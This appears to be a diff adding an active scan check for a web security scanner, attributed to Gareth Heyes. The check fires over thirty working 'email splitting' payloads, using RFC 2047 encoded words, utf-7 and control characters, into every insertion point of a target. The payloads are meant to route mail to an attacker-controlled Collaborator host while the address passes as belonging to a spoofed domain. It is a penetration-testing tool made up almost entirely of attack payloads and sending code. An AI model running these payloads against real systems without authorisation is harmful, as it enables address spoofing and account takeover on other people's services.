|
| 1 | +id: 5ce07589-6bec-4aec-8c86-ae26974bc17f |
| 2 | +name: Email splitting default collaborator |
| 3 | +function: SCAN_CHECK_ACTIVE_PER_INSERTION_POINT |
| 4 | +location: SCANNER |
| 5 | +source: | |
| 6 | + /** |
| 7 | + * Performs an email splitting attack using encoded word. |
| 8 | + * The default Collaborator client is used to retrieve interactions. |
| 9 | + * You should change the spoofServer to be your target domain e.g. example.com |
| 10 | + * Note this scan check using the default Collaborator tab and doesn't raise any issues. |
| 11 | + * This allows you to use a long running task over the 2 minute window for scan checks. |
| 12 | + * The main Collaborator tab will be updated if your probes are successful and receive Collaborator interactions. |
| 13 | + * |
| 14 | + * @author Gareth Heyes |
| 15 | + **/ |
| 16 | + |
| 17 | + var techniques = new String[]{ |
| 18 | + "=?x?q?$COLLABORATOR_PAYLOAD=40$COLLABORATOR_SERVER=3e=00?=foo@$SPOOF_SERVER", |
| 19 | + "=?x?q?$COLLABORATOR_PAYLOAD=40$COLLABORATOR_SERVER=3e=01?=foo@$SPOOF_SERVER", |
| 20 | + "=?x?q?$COLLABORATOR_PAYLOAD=40$COLLABORATOR_SERVER=3e=02?=foo@$SPOOF_SERVER", |
| 21 | + "=?x?q?$COLLABORATOR_PAYLOAD=40$COLLABORATOR_SERVER=3e=03?=foo@$SPOOF_SERVER", |
| 22 | + "=?x?q?$COLLABORATOR_PAYLOAD=40$COLLABORATOR_SERVER=3e=04?=foo@$SPOOF_SERVER", |
| 23 | + "=?x?q?$COLLABORATOR_PAYLOAD=40$COLLABORATOR_SERVER=3e=05?=foo@$SPOOF_SERVER", |
| 24 | + "=?x?q?$COLLABORATOR_PAYLOAD=40$COLLABORATOR_SERVER=3e=07?=foo@$SPOOF_SERVER", |
| 25 | + "=?x?q?$COLLABORATOR_PAYLOAD=40$COLLABORATOR_SERVER=3e=08?=foo@$SPOOF_SERVER", |
| 26 | + "=?x?q?$COLLABORATOR_PAYLOAD=40$COLLABORATOR_SERVER=3e=0e?=foo@$SPOOF_SERVER", |
| 27 | + "=?x?q?$COLLABORATOR_PAYLOAD=40$COLLABORATOR_SERVER=3e=0f?=foo@$SPOOF_SERVER", |
| 28 | + "=?x?q?$COLLABORATOR_PAYLOAD=40$COLLABORATOR_SERVER=3e=10?=foo@$SPOOF_SERVER", |
| 29 | + "=?x?q?$COLLABORATOR_PAYLOAD=40$COLLABORATOR_SERVER=3e=11?=foo@$SPOOF_SERVER", |
| 30 | + "=?x?q?$COLLABORATOR_PAYLOAD=40$COLLABORATOR_SERVER=3e=13?=foo@$SPOOF_SERVER", |
| 31 | + "=?x?q?$COLLABORATOR_PAYLOAD=40$COLLABORATOR_SERVER=3e=15?=foo@$SPOOF_SERVER", |
| 32 | + "=?x?q?$COLLABORATOR_PAYLOAD=40$COLLABORATOR_SERVER=3e=16?=foo@$SPOOF_SERVER", |
| 33 | + "=?x?q?$COLLABORATOR_PAYLOAD=40$COLLABORATOR_SERVER=3e=17?=foo@$SPOOF_SERVER", |
| 34 | + "=?x?q?$COLLABORATOR_PAYLOAD=40$COLLABORATOR_SERVER=3e=19?=foo@$SPOOF_SERVER", |
| 35 | + "=?x?q?$COLLABORATOR_PAYLOAD=40$COLLABORATOR_SERVER=3e=1a?=foo@$SPOOF_SERVER", |
| 36 | + "=?x?q?$COLLABORATOR_PAYLOAD=40$COLLABORATOR_SERVER=3e=1b?=foo@$SPOOF_SERVER", |
| 37 | + "=?x?q?$COLLABORATOR_PAYLOAD=40$COLLABORATOR_SERVER=3e=1c?=foo@$SPOOF_SERVER", |
| 38 | + "=?x?q?$COLLABORATOR_PAYLOAD=40$COLLABORATOR_SERVER=3e=1d?=foo@$SPOOF_SERVER", |
| 39 | + "=?x?q?$COLLABORATOR_PAYLOAD=40$COLLABORATOR_SERVER=3e=1f?=foo@$SPOOF_SERVER", |
| 40 | + "=?x?q?$COLLABORATOR_PAYLOAD=40$COLLABORATOR_SERVER=3e=20?=foo@$SPOOF_SERVER", |
| 41 | + "=?x?q?$COLLABORATOR_PAYLOAD=40$COLLABORATOR_SERVER=2c?=x@$SPOOF_SERVER", |
| 42 | + "=?utf-7?q?$COLLABORATOR_PAYLOAD&AEA-$COLLABORATOR_SERVER&ACw-?=foo@$SPOOF_SERVER", |
| 43 | + "=?utf-7?q?$COLLABORATOR_PAYLOAD&AEA-$COLLABORATOR_SERVER&ACw=/xyz!-?=foo@$SPOOF_SERVER", |
| 44 | + "=?utf-7?q?$COLLABORATOR_PAYLOAD=26AEA-$COLLABORATOR_SERVER=26ACw-?=foo@$SPOOF_SERVER", |
| 45 | + "$COLLABORATOR_PAYLOAD=?utf-7?b?JkFFQS0?=$COLLABORATOR_SERVER=?utf-7?b?JkFDdy0?=foo@$SPOOF_SERVER", |
| 46 | + "$COLLABORATOR_PAYLOAD=?x?b?QA==?=$COLLABORATOR_SERVER=?x?b?LA==?=foo@$SPOOF_SERVER", |
| 47 | + "=?utf-7?q?$COLLABORATOR_PAYLOAD&AEA-$COLLABORATOR_SERVER&ACA-?=foo@$SPOOF_SERVER", |
| 48 | + "=?utf-7?q?$COLLABORATOR_PAYLOAD&AEA-$COLLABORATOR_SERVER&ACA=/xyz!-?=foo@$SPOOF_SERVER", |
| 49 | + "=?utf-7?q?$COLLABORATOR_PAYLOAD=26AEA-$COLLABORATOR_SERVER=26ACA-?=foo@$SPOOF_SERVER", |
| 50 | + "$COLLABORATOR_PAYLOAD=?utf-7?b?JkFFQS0?=$COLLABORATOR_SERVER=?utf-7?b?JkFDdy0?=foo@$SPOOF_SERVER", |
| 51 | + "$COLLABORATOR_PAYLOAD=?x?b?QA==?=$COLLABORATOR_SERVER=?x?b?LA==?=foo@$SPOOF_SERVER" |
| 52 | + }; |
| 53 | + |
| 54 | + var spoofServer = "target.domain"; |
| 55 | + |
| 56 | + for(var technique: techniques) { |
| 57 | + var payload = api().collaborator().defaultPayloadGenerator().generatePayload(); |
| 58 | + technique = technique.replaceAll("[$]COLLABORATOR_SERVER", payload.server().get().address()); |
| 59 | + technique = technique.replaceAll("[$]COLLABORATOR_PAYLOAD", payload.id().toString()); |
| 60 | + technique = technique.replaceAll("[$]SPOOF_SERVER", spoofServer); |
| 61 | + |
| 62 | + HttpRequestResponse reqResp = http.sendRequest(insertionPoint.buildHttpRequestWithPayload(ByteArray.byteArray(technique))); |
| 63 | + } |
| 64 | + |
| 65 | + return null; |
0 commit comments